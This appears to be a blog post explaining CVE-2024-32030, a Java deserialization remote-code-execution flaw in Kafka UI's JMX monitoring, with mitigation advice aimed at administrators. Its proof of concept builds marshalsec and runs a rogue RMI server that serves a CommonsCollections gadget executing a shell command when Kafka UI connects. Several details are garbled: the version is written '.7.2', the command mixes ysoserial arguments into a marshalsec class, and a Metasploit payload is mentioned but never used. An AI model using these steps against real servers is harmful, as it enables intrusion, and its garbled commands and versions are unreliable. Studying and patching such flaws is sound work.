CVE-2024-32030 - Remote Code Execution in Kafka UI via JMX/RMI Deserialization

A high-severity vulnerability, CVE-2024-32030, was found in Kafka UI, a popular open-source tool for managing Apache Kafka clusters. The flaw allows attackers to execute arbitrary code on servers running Kafka UI versions below .7.2. This happens via a deserialization bug in the JMX monitoring feature, which speaks RMI and can be abused to run malicious code if not properly controlled.

This post breaks down the issue step by step and provides exclusive insight with clear, beginners-friendly language.

What is Kafka UI?

Kafka UI is a web interface that helps users manage Kafka clusters. It connects to brokers, lets people browse topics, and shows performance metrics. By default, it does not require authentication and allows users to specify Kafka broker addresses and monitoring endpoints.

Kafka UI can monitor brokers' health and performance by connecting to their JMX (Java Management Extensions) port. JMX, in turn, is built on the RMI protocol and allows remote access to Java objects.

Understanding the Vulnerability

Summary:
Kafka UI lets users specify the host and port of Kafka brokers and their JMX ports. If a bad actor can point the UI’s backend at an RMI server under their control, they can send serialized Java payloads that get deserialized and executed by the server—leading to Remote Code Execution (RCE).

Vulnerable Configurations

dynamic.config.enabled is set:

Not enabled by default, but many tutorials and the official README advise enabling it for flexibility.

Attacker owns or can influence a Kafka cluster:

If the attacker controls the Kafka broker being monitored, they can supply malicious JMX host/port metadata.

Why is JMX Dangerous?
JMX uses RMI for remote communication, which is *known* for being vulnerable to unsafe object deserialization. When Java apps deserialize untrusted data, code execution is possible if certain Java libraries (so-called *gadget chains*) are present—which is the case for Kafka UI.

Default is Insecure:
To make things worse, Kafka UI has no authentication set by default, so anyone who can reach the UI dashboard can point it at a malicious RMI endpoint.

How the Attack Works

Let’s break down the exploitation process for CVE-2024-32030.

dynamic.config.enabled set (_or_)

- The attacker has access/control of a Kafka broker being managed by Kafka UI.

Kafka UI is reachable from the attacker's machine (e.g., over LAN, VPN, or the internet).

- Kafka UI is running on a machine with Java gadget chains present (probable unless stripped/locked down carefully).

2. Setting up a Malicious RMI Server

The attacker sets up a rogue RMI server that, whenever anyone connects, responds with a Java object that triggers evil code when deserialized.

Example exploit tool: marshalsec
Attackers commonly use this tool to create such malicious RMI servers.

3. Exploiting Kafka UI

- The attacker points the Kafka UI's JMX monitoring feature at the address/port of their rogue RMI server.

Exploit Code Example

Let’s walk through a minimal proof of concept. Here we use marshalsec and the standard Metasploit Java payload, but you could use any compatible Java deserialization exploit.

Step 1: Download and Build marshalsec

git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests

Step 2: Start the Malicious RMI Server

Suppose you want Kafka UI to run /tmp/exploit.sh when it deserializes.

First, create payload with ysoserial (or use marshalsec’s gadgets)

java -cp marshalsec/target/marshalsec.jar marshalsec.jndi.RMIRegistryExploit \
  "CommonsCollections1" "touch /tmp/pwnd" \
  1099

*This starts an RMI server on port 1099. When a victim connects, if it deserializes objects with the CommonsCollections gadget (present in most Java servers), it will run touch /tmp/pwnd.*

Set the JMX port to 1099 and JMX host to the attacker's IP (where the RMI server is running).

Boom! Now, as soon as Kafka UI tries to fetch metrics, it will connect to the rogue RMI server and execute the payload.

Real-World Impact

- Remote Code Execution (RCE): Attackers gain shell access as the user running Kafka UI (usually a service account that often has access to private keys, environment variables, etc.)
- Post-auth Exploit: If authentication is enabled, the attacker must be able to set a new cluster/JMX host— but by default, there’s no auth.
- Wormability: If Kafka UI manages multiple clusters, a single compromise can lead to wider infrastructure breaches.

Mitigation & Fix

Patch:
The issue is fixed in Kafka UI version .7.2.

- Release notes for .7.2

No Workaround:
There is no known workaround. Merely firewalling JMX ports does not help if the attacker controls the broker or UI endpoint configuration.

Restrict network access so only trusted users can reach the Kafka UI interface.

- Audit all logs for unusual JMX/RMI connections.

References

- GHSL-2023-230 Security Advisory
- Original GitHub Issue & Fix
- Kafka UI README
- marshalsec (RMI Attack Tool)
- JMX Deserialization Exploits
- CVE Record at NVD


In Summary:
If you use Kafka UI, double-check your version and do not let users specify arbitrary JMX endpoints. Upgrade to .7.2 or newer now— this is a critical, easily exploitable RCE vulnerability.


*This deep dive was crafted exclusively for easy understanding by sysadmins, engineers, and infosec professionals dealing with Kafka infrastructure.*

Timeline

Published on: 06/19/2024 17:15:57 UTC
Last modified on: 08/02/2024 01:59:50 UTC